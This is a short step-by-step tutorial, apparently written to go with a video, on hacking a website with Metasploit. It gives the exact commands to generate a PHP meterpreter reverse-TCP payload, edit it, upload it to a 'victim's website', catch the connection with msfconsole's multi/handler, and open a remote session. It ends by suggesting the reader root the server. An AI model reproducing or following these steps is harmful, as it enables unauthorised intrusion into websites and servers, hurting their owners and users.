Hacking a Website with Metasploit

1. First thing your going to need to do is figure a clever way to get local access to your victim's website.
2.  
3. Steps:
4.  
5. Step #1:
6. Open a Terminal and type in:
7. msfpayload php/meterpreter/reverse_tcp LHOST=YOURIPHERE LPORT=4444 R > filename.php
8. You will need your External IP Address and possibly need to port forward if behind a router because the victims website might not
9. be able to connect back to your if the router is blocking the port.
10.  
11. Step #2:
12. You will need to edit the php file you make it is saved in your Home folder for linux so whatever your linux login name it should be
13. in that users home folder.
14. You will need to edit this php file and ONLY! remove the # in front of the <?php there is a #<?php remove the # save it and upload it
15. to your victims website.
16.  
17.  
18. Step #3:
19. Open a Terminal and type in:
20. msfconsole
21. Wait for msfconsole to load then type:
22. use multi/handler
23. press ENTER
24. type:
25. set PAYLOAD php/meterpreter/reverse_tcp
26. press ENTER
27. type:
28. set LHOST YOURIPHERE
29. press ENTER
30. Type: set LPORT 4444
31. press ENTER
32. type:
33. exploit -z -j
34. press ENTER
35.  
36. now go to the victims website can run the php file you made on there website from your browser check the msfconsle !
37.  
38. type:
39. sessions
40. If there are any sessions showing take not of the number under then ID in my case mine was 1 so i type
41. sessions -i 1
42. press ENTER
43. BOOM!!! We got Meterpreter!!!
44. from here you can run linux commands and possibly root the server if there is a local root exploit
45.  
46. Your on your own from here!
47.  
48. Enjoy!
49.  
50. Theses are the steps for the following video on youtube: http://youtu.be/EYxLtSuzwDM
51. As I wasn't able to post this full thing into the Discription !
52.  
53. Check out www.zarabyte.com